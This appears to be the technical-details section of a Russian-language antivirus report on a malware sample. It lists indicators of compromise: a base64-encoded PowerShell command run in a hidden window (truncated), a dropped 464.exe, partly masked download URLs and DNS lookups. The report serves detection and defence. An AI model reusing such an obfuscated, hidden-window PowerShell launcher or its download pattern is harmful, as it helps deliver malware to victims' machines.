Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGUAYgByAGkAbwB4AGsAYQB1AG4APQAnAGIAbwBnAGwAbwBvAHQAcQB1AGkAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIASQB0AFkAUABgAFIAYABvAHQATwBgAG...
- %HOMEPATH%\464.exe
- %HOMEPATH%\464.exe
- %HOMEPATH%\464.exe
- http://ci###aft.net/anticheat/3wj3/
- http://cl####cpaint.net/wp-content/ssc/
- http://ga####lfelipe.com/steiin-admin/kmlsy/
- http://hh##nz.eu/_borders/tm38ymz/
- http://ho####ishops.com/test/home/mcg3/
- DNS ASK ci###aft.net
- DNS ASK cl####cpaint.net
- DNS ASK ga####lfelipe.com
- DNS ASK hh##nz.eu
- DNS ASK ho####ishops.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGUAYgByAGkAbwB4AGsAYQB1AG4APQAnAGIAbwBnAGwAbwBvAHQAcQB1AGkAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIASQB0AFkAUABgAFIAYABvAHQATwBgAG...' (со скрытым окном)